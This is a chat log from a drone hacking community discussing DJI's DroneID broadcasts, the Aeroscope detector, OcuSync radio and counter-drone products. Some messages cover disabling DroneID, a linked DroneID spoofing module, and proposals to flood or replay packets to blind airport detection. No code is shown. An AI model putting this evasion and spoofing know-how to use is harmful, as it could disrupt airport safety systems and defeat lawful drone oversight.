[2018-08-02 16:55:12] hostile : no c2 is "tamper proof"

[2018-08-02 16:55:13] hostile : period

[2018-08-02 16:55:34] validat0r : isnt it secured by wpa2?

[2018-08-02 17:06:49] hostile : I can't really discuss the semantics of their c2 links in the context of tampering

[2018-08-02 17:06:52] hostile : sorry mate

[2018-08-02 17:44:19] aciid : well lets talk about something happier, like, how we could approach DJI products with SDR devices

[2018-08-02 17:44:41] aciid : need to set up shop and all that probably because of the noise

[2018-08-02 18:20:56] hostile : I can't participate in that conversation, sorry! Many others can't here for the reasons mentioned above. Those with the skill either work for, or have been approached by counter UAS companies to do the same thing. Highly unlikely to see free SDR work for occusync / lightbridge in*here*

[2018-08-02 18:23:37] aciid : yeah I'm just interested in understanding these technologies. I know you are all careful and probably it's best to keep somethings under wraps out of commercialization

[2018-08-02 18:34:30] aciid : well I think I'll start working on these subjects more once I finish my HAM operator license this fall have some more ground on subject by then.

[2018-08-04 19:28:37] aholtzma : @aciid if you want to get started learning more about SDR, this is a cheap option at $99 <http://www.analog.com/en/design-center/evaluation-hardware-and-software/evaluation-boards-kits/adalm-pluto.html#eb-overview> (and hackable up to 6 GHz)

[2018-08-04 19:29:24] aholtzma : this will let you capture some traffic and then you can pull it apart offline using python

[2018-08-04 19:32:06] aholtzma : though it is an immense undertaking to blind RE a wireless protocol even if you are an expert

[2018-08-04 19:32:17] aholtzma : a good learning experience though

[2018-08-04 19:33:15] aholtzma : luckily none of this stuff a completely bespoke, they reused bits and pieces from various standards

[2018-08-04 21:04:06] aciid : Interesting is the FPGA board separate from the main MCU? That would kncrease field usage if apps could be programmed into that. I have a hackrf , but it’s hard to use on the field since the apps need to be coded in firmware or use a laptop. Not a problem tho since i usually study at home on workbench

[2018-08-05 10:45:25] mathieu.peyrega : ath9k installed and working ! now with this and hackRF and think I have the basic toolbox to start looking into those RF things

[2018-08-05 10:47:56] aciid : welcome to the hidden world

[2018-08-05 14:58:25] validat0r : Hmm .. Nothing at 5ghz?

[2018-08-05 14:58:52] validat0r : Whats The 1.5 GHz peak?

[2018-08-05 14:59:36] validat0r : Cellular network?

[2018-08-05 15:22:53] mathieu.peyrega : You see a spike around 1.5GHz ?

[2018-08-05 15:24:16] mathieu.peyrega : If around 1.575 could be some leaks from the GPS active antenna

[2018-08-05 15:31:22] validat0r : is this gone when AC/RC are off?

[2018-08-05 15:33:44] validat0r : right at 1.5GHz I see wireless microphones at 50mW max.

[2018-08-05 15:34:41] validat0r : and some military stuff

[2018-08-05 15:35:52] validat0r : when looking at german regulatory information.

[2018-08-05 15:51:54] validat0r : whats that supposed to mean?

[2018-08-05 15:56:39] aciid : probably conforming to standards to use channel widths that are specified on that band

[2018-08-06 16:51:10] aciid : reflection from next door apartments 4G repeater

[2018-08-09 16:49:09] hostile : is this guy serious? <https://twitter.com/dronelaws/status/1027186683601723392>

[2018-08-09 16:49:20] hostile : <https://twitter.com/DJIGlobal/status/1027335345359052800>

[2018-08-09 16:49:22] hostile : what a joke!

[2018-08-09 17:02:34] mathieu.peyrega : lol, most weapon manufacturer sell the weapon and the anti-weapon... (like air to ground missiles) and ground defense systems...

[2018-08-09 17:02:48] mathieu.peyrega : do gun manufacturers also sells bulletproof jackets ?

[2018-08-09 17:04:02] mathieu.peyrega : I love how medias seems to discover that UAV are threats...

[2018-08-09 17:05:00] mathieu.peyrega : while it was only in Syria / Irak they did not seems too much concerned but now that it "looks" plausible to get something like that happening at home they are writing about (and interviewing the wrong peoples...)

[2018-08-09 18:02:35] aciid : DJI falseflag 2018 :smile:

[2018-08-09 20:21:56] wesleymiller : It seems like reports only come out in the media on the front page when they are seeking to change public opinion to forward an agenda... or if it's too big to ignore. Otherwise it's buried 10 pages in.

[2018-08-12 12:46:10] eseven : Droneid is only applied at spark, mavic, phantom and inspire? or whole dji catalog?

[2018-08-12 12:51:36] hostile : whole catalog

[2018-08-12 12:51:43] hostile : only works on wifi for spark and mavic air

[2018-08-12 12:51:59] hostile : specifically on a special 5mhz channel spacing (not 5ghz I said 5mhz)

[2018-08-12 12:52:15] hostile : older birds pre p4 do not have droneid

[2018-08-13 05:40:30] eseven : The no wifi, droneid is inside occusync packets or send a beacon like packet?

[2018-08-13 05:47:07] eseven : Lightbridege, occusync hardware have mac address, it would mean that DJIis implementing some kind of IP stack (there are also non IP stacks using MAC), with broadcast/multicast features. Could it be 802.11p? Using OCB? Modded kernel region params? :thinking_face:

[2018-08-13 13:15:13] hostile : they are sent using occusync hardware, but sent out of band to normal data streams

[2018-08-27 13:05:29] eseven : ok. But you might know that this out of band can be managed by the correct ath9k Patch. A good solution to not use a SDR

[2018-08-27 13:18:54] hostile : there is no "patch" for 5mhz ... this is a hardware thing @miliu00 5ghz frequency patch has nothing to do with 5mhz channel spacing at hardware level.

[2018-08-27 13:28:59] eseven : I'm talking about using "non standard" channel frequencies, not bandwidths and spacings..

[2018-08-27 13:32:12] eseven : I sugest to use it to dump ocusync packets, not adhoc ones

[2018-08-27 14:39:48] kilrah : then you're not getting the droneid packets...

[2018-08-27 14:43:35] hostile : @miliu00 there is currently no occusync demodulator that is public. If you have gnuradio code, I'd be keen to see you catching out of band ligthbridge, or occusync drone id packets. I'm aware of no one with anything public, short of making pretty spectrum graphs and saying "I see it!". There are neither public Occysync, or Lightbridge demodulators, nor drone ID demodulators for either protocol. ONLY code public for droneID now is the Kismet code for the Adhoc wifi.

[2018-08-27 14:43:54] hostile : packets are out of band on the c2 link as they can not be encrypted

[2018-08-27 14:44:02] hostile : or AeroScope would not be able to see them.

[2018-08-29 09:31:15] eseven : Are you sure that lightbridge/ocusync 10mhz ofdm downstream is C2 link? It uses to be on upstream (RC- RPAS) with fhss con it. Downstream is "ip stacked" broadcast and on single channel..

[2018-08-29 09:32:39] eseven : Maybe de might open a lightbridge/ocusync thread:thinking_face:

[2018-09-05 08:33:00] pnndra : good morning. i am trying to reverse the protocol between Aeroscope and DJI Assistant. i am already able to get positions and a lot of other data but there a re a few things i'm missing. is this the right place to discuss this?

[2018-09-05 08:35:55] validat0r : technically, yes. but i've never seen anybody looking at this in here.

[2018-09-05 08:36:36] pnndra : ok. i think it's very similar to what is actually being used in other topics such as log files

[2018-09-05 08:37:17] pnndra : i see that some data corresponds for example to the data structure of log files inside the drone

[2018-09-05 12:18:30] santiago.gadget : Ok - do you receive the data just internally ?

[2018-09-05 12:18:49] santiago.gadget : Or do you actually have a RF receiver to really receive the data from the air ?

[2018-09-05 12:18:53] santiago.gadget : This is quite interesting..

[2018-09-05 12:57:44] hostile : it is broadcast over multicast on the same LAN if you are connected to its LAN port

[2018-09-05 15:32:55] santiago.gadget : ok - which lan port ? - the wifi from the copter itself ? - or are you talking about a wifi version ?

[2018-09-05 15:33:29] santiago.gadget : normally this is via OFDM, no ?

[2018-09-05 15:36:41] hostile : "protocol between Aeroscope and DJI Assistant."

[2018-09-05 15:36:54] hostile : I am speaking to @pnndra

[2018-09-05 15:37:18] hostile : the data on lan is based on what was captured over RF

[2018-09-05 19:20:20] pnndra : @hostile yes i know. i already extracted almost everything but have some doubts on packet format

[2018-09-05 19:20:32] pnndra : as i see that different drones have packets with different lengths

[2018-09-05 19:21:15] pnndra : and am wondering how it is structured as i see there are some bitfields in protocols handled elsewhere that seem to enable/disable records

[2018-09-05 19:29:43] hostile : you should study what was done in Kismet

[2018-09-07 18:04:41] kyokushin : !apk

[2018-09-14 19:46:34] hostile : @bryanhalf

[2018-09-14 19:46:37] bryanhalf : @bryanhalf has joined the channel

[2018-09-14 19:47:15] hostile : I forget <!here> didn't one of you in @channel patch a dji_ binary to stop transmitting droneid? hdvt binary perhaps? someone here put this puzzle back together for me. =]

[2018-09-14 20:13:30] pingspike : That needs building in to deejayeye-modder :+1::skin-tone-2:

[2018-09-14 20:18:27] jcase : uh

[2018-09-14 20:18:35] jcase : deejayeue modder mods the app

[2018-09-14 20:18:37] jcase : not teh drone

[2018-09-15 14:31:59] pingspike : oh yeah, good point... :blush:

[2018-09-15 17:26:17] christianwoodward : @hostile I remember that too

[2018-09-15 17:26:30] christianwoodward : youre not crazy (yet)

[2018-09-15 17:26:50] christianwoodward : maybe it was in hardware?

[2018-10-12 14:39:05] rcflyer40t : Any updates to working around broadcasting our information to aeroscope?

[2018-10-12 14:40:09] cantrepeat : The NLD GO app stops it.

[2018-10-12 14:40:42] rcflyer40t : Ah, so run that app vs dji app. That I can do.

[2018-10-12 14:41:09] rcflyer40t : Thanks @catalinaskirace

[2018-10-12 15:12:51] cantrepeat : You can run the NLD and the DJI app side by side but the DJI app will still send your data. So, if you want to go offline completely only run the NLD app.

[2018-10-12 15:16:37] kilrah : that's what he was saying

[2018-10-12 15:55:41] rcflyer40t : I got that... But thanks for the clarification... Here's a question, aeroscope can read you drones serial as well. Is that taken from the remote side, or from the drone side?

[2018-10-12 16:00:44] good.win.alexs : @catalinaskirace So, DroneId is controlled over Go? Is it true?

[2018-10-12 16:15:14] cantrepeat : That is what I have read

[2018-10-12 16:18:57] cantrepeat : I don't recall, but I read it in either, a blog, on the website or might even be text in the apk patcher process.

[2018-10-12 16:27:37] cantrepeat : Im pretty sure we talked about it on slack at least a few times

[2018-10-12 16:29:09] cantrepeat : iirc NLD stops the communication between the drone and the RC that areoscope uses to ID the bird and account connected to it.

[2018-10-12 17:56:08] hostile : @rcflyer40t you should read this... <https://department13.com/dev/wp-content/uploads/2018/02/Anatomy-of-DJI-Drone-ID-Implementation1.pdf>

[2018-10-12 18:26:13] rcflyer40t : Thanks everyone for the info so far. @hostile thank you for the lunch time reading. Glad to see it's not being broadcasted. Should be left up to us, but considering they way the government works, it's always do first ask for permission after the civilians start the witch hunt.

[2018-10-12 18:27:13] cantrepeat : @hostile am I remembering it correctly?

[2018-10-12 18:35:46] hostile : there are a few ways to accomplish things. i don't recall which nasty trick @coldflake implemented.

[2018-10-21 03:02:15] rcflyer40t : "iirc NLD stops the communication between the drone and the RC that areoscope uses to ID the bird and account connected to it." What about if I want to use an iPad app and not an Android? Nld doesn't have an iPad version like that, which doesn't transmit the pilot data. Or is there one?

[2018-10-21 08:31:33] kilrah : nope

[2018-10-21 17:45:32] rcflyer40t : Bahhh that sucks

[2018-10-21 18:23:13] hostile : you need to stop in ~ios_ipa_reversing and put in some Frida work =]

[2018-12-28 16:07:47] fallengod : <https://dronelife.com/2018/12/27/u-k-airports-are-testing-drone-detection-technology-now-heres-how-many-drones-theyve-found/>

[2018-12-28 16:08:35] fallengod : Let do our best to make a system like this totally useless

[2018-12-28 17:42:05] hostile : best of luck!

[2018-12-28 17:42:16] hostile : you'll need a signature generation engine

[2018-12-28 17:42:29] hostile : currently only available for DJI products on DroneID over wifi.

[2018-12-28 18:19:13] fallengod : Would we not flood the airwaves with captures dji packets?

[2018-12-28 18:21:20] validat0r : I hope airports dont rely on airoscope only .. should be an effective low-cost DoS

[2018-12-28 18:22:57] hostile : @fallengod replayed DJI packets would only be so effective... depends on how the system does detects I guess, and how intelligent its logic is. (if it dissects telemetry data, etc)

[2018-12-28 18:23:22] hostile : most systems likely not very robust... but in order to visualize the real impact, you'd need some insider access

[2018-12-28 18:26:52] fredmicrowave : Is it safe to rely that much on passive detection when drones could be silent ?

[2018-12-28 18:29:43] hostile : yeah most CUAS platforms are not mature

[2018-12-28 18:29:50] hostile : require cooperative sensor work

[2018-12-28 18:29:53] hostile : not JUST RF,

[2018-12-28 21:04:40] fallengod : Or just have 100 drones in a truck with 100 radio power on and watch the airport shutdowns and the news call out drone swam

[2018-12-28 21:23:22] hostile : guess it depends on how bad you want to get vanned

[2018-12-28 21:23:33] hostile : I recommend the balloon + throwie route personally

[2018-12-28 21:47:28] bobdole : why would i care if someone knew i was flying a hubsan instead of a parrot?

[2018-12-28 21:48:23] bobdole : seems like they're just trying to grab a piece of dji's aeroscope market share by showing other drones out there

[2018-12-28 21:52:24] hostile : why would you care? I don't know @jacksphone tell me about your assets... "grab a piece of dji's aeroscope market", that is one of the stupidest things I've heard in a while. Aeroscope is contrived simply so DJI can sell more of its own products while hand waving about threats. It is NOT a player in the CUAS market. It can't mitigate, and can only detect its own products.

[2018-12-28 21:53:05] bobdole : why so hostile? lol

[2018-12-28 21:53:10] bobdole : it was a serious question

[2018-12-28 21:53:27] hostile : so was my "tell me about your assets" question.

[2018-12-28 21:53:57] hostile : what is your current threat model? **which** hubsan? **which** parrot?

[2018-12-28 21:54:01] bobdole : dedrone is soemthing to worry about?

[2018-12-28 21:54:03] hostile : lots goes into that question and answer =]

[2018-12-28 21:54:43] hostile : define "worry", and in what context?

[2018-12-28 21:57:31] bobdole : ok... my concern is i don't want my drone's serial number or my personal info broadcast for anyone to pick up. i simply don't like aeroscope because dji is trying to give out my personal info... it looks like dedrone can find out what you are flying and how to take it down. i don't intend to attack military bases or disrupt airports (hopefully ever), so i'm not worried about someone trying to take my drone down. as far as i'm concerned it is way too easy to take out a drone

[2018-12-28 21:58:35] bobdole : im also assuming that airports want to identify drone pilots for the public trial

[2018-12-28 21:58:41] hostile : I've discussed your concerns in a whitepaper I wrote fwiw. <https://department13.com/dev/wp-content/uploads/2018/02/Anatomy-of-DJI-Drone-ID-Implementation1.pdf>

[2018-12-28 21:59:05] hostile : it is assumed that you know I work for a counter drone company, **not** dedrone

[2018-12-28 21:59:26] bobdole : no. i honestly am pretty ignorant and often come across as offensive

[2018-12-28 21:59:34] bobdole : maybe its my handle?

[2018-12-28 21:59:54] hostile : haha no I often come off as offensive too... hence my name :wink:

[2018-12-28 21:59:56] hostile : no stress here.

[2018-12-28 22:00:15] hostile : having a threat model discussion is prudent to say the least

[2018-12-28 22:00:53] bobdole : so i shouldn't have grouped dji and dedrone in the same sentence i'm guessing?

[2018-12-28 22:01:03] hostile : here is an example... of I did for a risk assesment at the largest airport here in the US traffic wise. <https://prezi.com/view/hIqARQObz3gLwHhJN6tE>

[2018-12-28 22:01:26] hostile : DJI's product is a ruse... literally to help them continue sales here in the US via a handwave.

[2018-12-28 22:01:32] hostile : it is a joke of a CUAS product

[2018-12-28 22:02:38] bobdole : ah... i see how ridiculous my comment was about their market share

[2018-12-28 22:02:53] hostile : Dedrone was here before them =]

[2018-12-28 22:03:10] hostile : Aeroscope IMHO is a reactionary product not actually intended to detect drones

[2018-12-28 22:03:23] hostile : (else it would have more plugins for NON dji drones)

[2018-12-28 22:03:59] bobdole : well any awareness you have on the target (as well as number of targets) is a godsend compared to "flying in the dark" as aeroscope would have left an airport that was dealing with hacked dji drones

[2018-12-28 22:03:59] hostile : also the whole broadcast system... was unnecessary. (We at department13) have been using characteristics in DJI's protocol for years now to detect **specific** drones sans the need to tie serial number, etc in.

[2018-12-28 22:04:29] bobdole : mesmer

[2018-12-28 22:04:34] hostile : aye

[2018-12-28 22:05:04] hostile : mesmer had DJI detection capability and ID functionality way before Aeroscope lol

[2018-12-28 22:05:14] hostile : DJI is kinda goofy like that

[2018-12-28 22:05:28] hostile : lets **invent** something that doesnt need to be invented, and then lobby to high hell for it

[2018-12-28 22:06:16] bobdole : i'm really curious about mesmer and i'm sure i won't get any answers about how it works... but is mesmer something that a civilian can acquire?

[2018-12-28 22:06:29] hostile : no it is heavily controlled

[2018-12-28 22:06:32] hostile : buyers vetted

[2018-12-28 22:07:01] bobdole : i heard an oligarch on a yacht was using CUAS on some youtuber

[2018-12-28 22:07:03] hostile : I've given lots of hints about it in my public talks

[2018-12-28 22:07:20] hostile : said oligarch was not using MESMER to my knowledge lol

[2018-12-28 22:07:26] hostile : but yes I heard of this too

[2018-12-28 22:07:32] hostile : probably just had a nice chinese jammer

[2018-12-28 22:08:21] bobdole : assuming china has bugs everywhere and probably has a clone of mesmer by now... what might i have to worry about from an oligarch on a yacht if i were to take a closer look at his party?

[2018-12-28 22:08:53] bobdole : compass error and flyaway?

[2018-12-28 22:09:14] hostile : we pitch controlled take overs

[2018-12-28 22:09:23] hostile : we have working emulation of specific bits of DJI control protocol

[2018-12-28 22:09:26] bobdole : oh thats right i forgot about that

[2018-12-28 22:09:30] hostile : we tell it where to land

[2018-12-28 22:09:41] hostile : but that is about all I can discuss, as has already been publically disclosed

[2018-12-28 22:09:51] bobdole : can any chinese product do that?

[2018-12-28 22:09:56] hostile : who knows

[2018-12-28 22:10:10] hostile : I know on the Bard CUAS list only shows 6 products listed as "protocol manipulation" capable, MESMER being one of said 6.

[2018-12-28 22:10:19] hostile : and even fewer have **demonstrated** said capability

[2018-12-28 22:10:38] hostile : <https://dronecenter.bard.edu/files/2018/02/CSD-Counter-Drone-Systems-Report.pdf>

[2018-12-28 22:11:04] bobdole : this is all great reading thank you

[2018-12-28 22:11:32] hostile : dinner time for me.

[2018-12-28 22:11:34] hostile : **salute**

[2018-12-28 22:11:45] bobdole : :+1:

[2018-12-29 17:37:23] sheldon.holy : I've played with portable aeroscope, it's handy for DJI drones but as above it suck for non DJI products

[2018-12-29 17:37:41] sheldon.holy : It is cheap though

[2018-12-29 17:54:43] irischnpak : Why are Rohde & Schwarz not mentioned? And also their method of tracking the drone, predicting the impact point and interfering with I2C communication via RF?

[2018-12-29 22:01:52] jcase : cheap?

[2018-12-29 22:01:56] jcase : portable aeroscope isnt cheap

[2018-12-30 00:27:23] sheldon.holy : Cheap compared to other drone detection systems

[2019-01-17 23:16:23] eitan1195 : obviously that aeroscope detects all dji drones, wondering however if anything other than aeroscope(mesmer for instance) detects ocusync?if so - why is aeroscope so widely-spread across airports.

[2019-01-17 23:18:19] jcase : yes other things do

[2019-01-17 23:18:26] jcase : because aeroscope is cheaper than other solutions

[2019-01-17 23:18:27] jcase : that do

[2019-01-17 23:18:54] eitan1195 : what other product detects ocusync?sounds interesting :slightly_smiling_face:

[2019-01-17 23:19:21] eitan1195 : i do wonder how airports are willing to rely on aeroscope - a chinese owned company

[2019-01-17 23:19:23] eitan1195 : strange

[2019-01-17 23:23:47] jcase : several companies have products, check out D3 i think they can now

[2019-01-17 23:23:50] jcase : d13

[2019-01-17 23:24:44] eitan1195 : d13's mesmer?can it actually get flight info(serial, telemetry) or just detect a generic ocusync?sounds cool anyways

[2019-01-17 23:27:13] jcase : i dont know

[2019-01-17 23:27:17] jcase : i dont work for them

[2019-01-17 23:28:25] eitan1195 : fair [enough.as](http://enough.as) for the aeroscope - how expensive is it?

[2019-01-17 23:28:44] jcase : under 10k for the cheap one

[2019-01-17 23:30:39] eitan1195 : and it can't actually mitigate, simply fetch the detection info?if so - it is insufficient for airports i imagine

[2019-01-17 23:58:38] christianwoodward : there is a company that makes a mitigation device, I’d have to dig it up but it lands the copter and supports many manufacturers - granted I’m sure they dont work on custom builds or modded builds, but its still enough to sell

[2019-01-17 23:59:36] christianwoodward : they claimed to have “broken”/reversed many com channels and prob just overload the signal from the real remote - I do remember it didnt rely on GPS hacking

[2019-01-18 00:02:31] christianwoodward : I cant find the exact thing, it may be one of these: <https://www.droneshield.com/> <https://www.dronedefence.co.uk/products/skyfence/>

[2019-01-18 00:07:37] eitan1195 : super interesting, i'll have a look.generally interested in solutions that actually fetch information out of ocusync(telemetry etc..) :slightly_smiling_face:

[2019-01-18 01:16:55] hostile : @eitan1195 if you are looking for D13 mesmer info... ask for Matt Harvil, tell em Kevin sent ya.

[2019-01-21 02:15:27] huge1_10 : Hey has anyone seen the fakefake XXXX ID some AeroScope Detectors are pushing out on the screen?

[2019-01-21 02:17:00] huge1_10 : For instance this Drone ID is appearing fakefake005005029 and then fakefake02005029

[2019-01-21 02:17:42] huge1_10 : The above are directly after a P4P is detected

[2019-01-21 04:06:44] hostile : I wrote a droneID spoofer...

[2019-01-21 04:06:50] hostile : for Aeroscope....

[2019-01-21 04:07:07] hostile : @huge1_10 you can write what ever you want on an AeroScope

[2019-01-21 04:07:53] huge1_10 : So you can replace the Quadcopter Serial with any value you like?

[2019-01-21 04:08:15] hostile : I don't even have to operate one in the first palce. I can just mimic the packets.

[2019-01-21 04:08:53] huge1_10 : Ok got it....

[2019-01-21 04:08:54] hostile : <https://github.com/DJISDKUser/metasploit-framework/commit/4682525f176861d1cb68bf006ff0afe0a3ab5617>

[2019-01-21 04:08:57] hostile : this is the public version

[2019-01-21 04:10:16] huge1_10 : Ok, got it, many thanks for that.

[2019-01-21 10:02:46] validat0r : @huge1_10 recently bought one and suddenly realized how shitty it is?

[2019-01-21 15:16:34] fredmicrowave : sernum = "DroneID is crap!" :rolling_on_the_floor_laughing::+1:

[2019-01-21 15:23:53] hostile : you should have seen the video I made of it falling over

[2019-01-21 15:30:28] hostile : Gonna publish it for you now... hold on a few minutes

[2019-01-21 15:31:28] hostile : <https://youtu.be/EdRvaTlKJIA>

[2019-01-21 15:46:55] fredmicrowave : :joy: That´s awesome! Thanks!

[2019-01-21 16:02:15] fredmicrowave : And you even did it over there....

[2019-01-21 16:18:32] good.win.alexs : Do I understand correct - no wifi module = no problem? :smile:

[2019-01-21 16:18:37] good.win.alexs : on M1P

[2019-01-21 16:34:43] hostile : no you do not understand correct. Occusync modules also transmit droneid out of band

[2019-01-21 17:22:32] cantrepeat : lol you should set 3 fake drones with names, it's a bird, no it's a plane, no it's Superman!!!

[2019-01-21 19:15:07] jcase : @huge1_10 that means someone set the privacy bits

[2019-01-21 19:15:15] jcase : That isn't a as spoof

[2019-01-21 20:31:22] eitan1195 : cool video of the sppofing @hostile, does aeroscope indicate if the drone detected is wifi or rc(i could not tell from the quality of the video :neutral_face: )

[2019-01-30 02:55:03] bobdole : bill gates brings echodyne anti drone radar?? what does this system offer over the rest ? <https://gizmodo.com/this-startup-backed-by-bill-gates-and-dhs-is-gunning-to-1832157587>

[2019-01-30 04:35:03] czokie : Anyone going to send out a device to spoof? Might be fun to see the reaction?

[2019-01-30 04:35:39] czokie : I was actually going to ask if you were specifically going to do it @hostile - but that would be too obvious

[2019-01-30 04:37:03] czokie : Hmm. I just had another funny thought. Imagine if whatever system in use was connected to the “jumbo-tron” during an alert? Now THAT would be really cool to get footage of that “image” on the screen

[2019-01-31 11:03:14] the_lord : @huge1_10 like this one

[2019-01-31 12:02:02] validat0r : Oman?

[2019-01-31 13:48:28] the_lord : This test was in Oman yes

[2019-02-02 09:49:16] kilrah : awesome

[2019-02-28 15:57:38] antoine.menini :

[2019-02-28 15:57:56] antoine.menini : Hello, anyone has this problem with Mavic Pro drone ID on WiFI ?

[2019-02-28 16:06:05] antoine.menini : (I cannot upload pictures anymore)

[2019-02-28 16:06:56] antoine.menini : <https://imgur.com/a/jbD0qYJ>

[2019-02-28 16:15:43] validat0r : worked both times .. slack just sucks

[2019-03-09 20:08:01] kilrah : how about you say where you see that, in what app etc.

[2019-03-09 20:46:37] validat0r : thats kismet wireless

[2019-03-11 10:35:33] antoine.menini : yes sorry, that’s the Kismet implementation of droneID

[2019-03-11 10:47:19] eseven : @antoine.menini did you solved the "broken firmware" missage?

[2019-03-11 10:57:06] antoine.menini : Hello, no I didn’t

[2019-03-11 16:43:43] antoine.menini : It happens with my Mavic Pro (I use the stock FW from DJI)

[2019-03-11 22:02:10] eseven : Mavic pro firmware revision 01.04.0100 and 01.04.0200 doesn't send correctly a part of DroneID, ans use to show this message. Which firmware version do you have?

[2019-03-12 08:01:19] antoine.menini : I believe I have all the latest versions

[2019-03-12 08:01:38] antoine.menini : maybe they broke the droneID and need to do another update

[2019-03-12 21:35:12] eseven : Do you read droneid while drone is flying and home is set? Only send valid info during flight.

[2019-03-13 08:01:10] antoine.menini : No, the information of "broken firmware" is during the flight

[2019-03-15 11:56:38] eseven : Which wifi card do u use? Do you now the model? Could be some firmware lack..

[2019-03-15 12:35:31] antoine.menini : I use the AWUS036NHA

[2019-03-15 12:35:39] antoine.menini : with Atheros AR9271

[2019-03-29 19:27:39] euvele : Where can I get the Aeroscope SDK Package?

[2019-03-29 20:58:58] jcase : You have to pay for it

[2019-03-29 20:59:04] jcase : It's 50-75k

[2019-03-29 21:05:19] validat0r : for a download? :smile:

[2019-03-29 21:17:51] lolo780 : Not shareware?

[2019-03-29 21:20:09] validat0r : nice business model .. sell the drones and the counter-drone stuff

[2019-03-29 21:21:54] lolo780 : For sure.

[2019-03-29 21:22:07] lolo780 : I like two boobs

[2019-03-29 21:45:18] jcase : for libraries

[2019-04-08 15:25:35] xela75 : hey ! interesting topic !

[2019-04-08 15:27:09] xela75 : First of all, do we know how ocusync is ciphered ? Is it RC commands, video feed ? or both ?

[2019-04-08 15:27:49] xela75 : AFIK, it seems to be only for video...

[2019-04-08 15:36:19] validat0r : problem is receiving it in the first place, since it seems to be using a custom SDR

[2019-04-08 15:36:50] validat0r : plus: it's for video and rc commands both afaik

[2019-04-08 15:44:12] xela75 : so it's a kind of pre-shared key and not a end to end encryption mode ?

[2019-04-08 15:59:24] validat0r : yeah .. psk. no end to end. much like wifi adhoc mode

[2019-04-08 16:00:18] validat0r : i dont think communication over the ocu-channel is encrypted.

[2019-04-08 16:00:50] validat0r : but there are much more qualified guys here to speak about that

[2019-04-09 07:51:31] xela75 : ok ty

[2019-04-09 07:51:36] xela75 : so it's not secured at all

[2019-04-09 09:10:09] antoine.menini : and what about the Phantom? Has the communication been hacked yet?

[2019-04-13 13:22:29] jabuasab : @xela75 are you talking about the AES-256 encryption?

[2019-04-15 08:13:06] xela75 : yes I do

[2019-04-15 11:46:32] eseven : And what about cofdm params?

[2019-04-15 18:41:14] zwontzov.da : Ocusync is a LTE-like system: <http://www.programmersought.com/article/1509365733/>

[2019-04-17 12:38:00] eitan1195 : did anyone research or attempt to look at the aeroscope's usb interface to check what data is transferred there?or opened the box itself to find out what is in that large black box(modules,sdr,stuff?)

[2019-04-19 14:34:38] jakwnd : Has anyone successfully demoded an ocusync or lightbridge signal yet? Ive been looking at it for a while now.

[2019-04-19 14:35:22] lolo780 : Find anything interesting?

[2019-04-19 14:35:45] lolo780 : I'd like to know why occusync has a distance limit

[2019-04-19 14:35:49] jakwnd : just that im not as good with gnuradio as I thought

[2019-04-19 14:36:30] jakwnd : what do you mean? there is a hard coded distance limit?

[2019-04-19 14:38:08] lolo780 : Yes, the AC and RC can't be more than 17.9km apart

[2019-04-19 14:38:28] lolo780 : Otherwise the connection drops until the distance goes under the limit.

[2019-04-19 14:38:39] lolo780 : AC does RTH

[2019-04-19 14:39:19] jakwnd : woa thats interesting. Ill keep my eyes out

[2019-04-19 14:40:59] jakwnd : but the firmware updates specifically for ocusync or lightbridge are not easy to tear apart, dsp packages are not commonly supported by disassemblers, ive been banging my head on em for a bit now.

[2019-04-19 14:42:21] lolo780 : I guess that's why nobody has done it

[2019-04-19 14:44:35] jakwnd : I was hoping someone here might have tried before lol there was so much work done already identifying the firmware modules

[2019-04-19 14:50:39] lolo780 : Seems not much interest

[2019-04-19 14:51:02] lolo780 : Or more interesting things to work on

[2019-04-19 14:52:55] jakwnd : Yeah, I read this report from department 13 about how they implemented drone id for wifi, I'm curious how they do it for lightbridge/ocusync

[2019-04-19 14:52:57] jakwnd : <https://department13.com/dev/wp-content/uploads/2018/02/Anatomy-of-DJI-Drone-ID-Implementation1.pdf>

[2019-04-19 15:01:42] jakwnd : it also mentions this slack community a lot lol

[2019-05-02 11:11:49] peteair : I have. And that's not totally clear for me now. As far as I know the lightbridge uplink pulse are xPSK and not OFDM like stated everywhere

[2019-05-02 20:30:12] zwontzov.da : Ocusync 2.0 uses AES-256. So, how does aeroscope work with new drones?

[2019-05-02 20:43:28] lolo780 : Aeroscope is so powerful it can decode on the fly

[2019-05-02 20:57:33] kilrah : aeroscope doesn't crack the encrypted main stream that goes to you - it listens to a secondary stream the aircraft sends out specifically for it.

[2019-05-02 21:10:43] lolo780 : Oh

[2019-05-02 22:33:55] zwontzov.da : @kilrah thx. I hope droneid and telemetry packets is in the secondary stream and they can be potentially decoded. but i think that they are encrypted too by universal master key.

[2019-05-03 09:30:36] validat0r : droneid should be pretty much cleartext

[2019-05-03 09:30:59] validat0r : if the wifi implementation on spark is any indication

[2019-05-03 10:22:55] zwontzov.da : @ilovemynexus4 yes, I read MESMER report. but what is the profit of encryption in the case with AES?

[2019-05-03 10:25:30] validat0r : What aes layer is meant? The transport encryption similar to wpa2 on WiFi?

[2019-05-03 10:26:07] validat0r : Isn't occusync quite similar to WiFi just on another freq?

[2019-05-03 11:01:34] lolo780 : However it works, occusync is just amazing.

[2019-05-03 11:08:38] zwontzov.da : Ocusync isn't similar to WiFi, it's similar to LTE. I mean PHY layer. I read official release of DJI: Data Security – All data transmitted through OcuSync 2.0 is encrypted using the leading AES-256 standard, ensuring critical mission information is protected and can only be accessed by authorized parties. <https://www.dji.com/newsroom/news/dji-improves-enterprise-drones-and-fleet-management-software-to-enable-next-level-commercial-drone-operations>

[2019-05-03 11:12:07] nopcode : well, the important question is if the transmission can be disabled in the FW right?

[2019-05-03 11:15:50] validat0r : Yeah, anyway .. Point is, occusync transfer wont rat you out, droneid will

[2019-05-03 11:24:40] nopcode : occusync could be triangulated though. mavic 1 already sends droneid?

[2019-05-03 11:31:32] nopcode : oh i just saw the link to that youtube video of "jamming" aeroscope

[2019-05-03 11:31:32] validat0r : Can't really do RC stuff without emitting radio

[2019-05-03 11:31:41] nopcode : great that it can be jammed that easily

[2019-05-03 11:32:43] validat0r : You could do a mission though

[2019-05-03 11:33:18] nopcode : true. when a litchi mission is running you could just switch off the rc right?

[2019-05-03 11:34:53] validat0r : I don't do litchi missions .. Just the standard ones. And they are autonomous

[2019-05-03 14:35:21] zwontzov.da : @nopcode I thought that aeroscope is only passive unit and hasn't TX part. Besides, aeroscope should know about FHSS law of RC.

[2019-05-03 14:37:01] antoine.menini : I think Aeroscope is active but I’m not 100% sure

[2019-05-03 14:37:57] zwontzov.da : It was interesting to look at the spectrum of working complex...

[2019-05-03 14:44:16] zwontzov.da : @ilovemynexus4 hm, droneid has home point location too, so the receiving of it can detect the pilot position

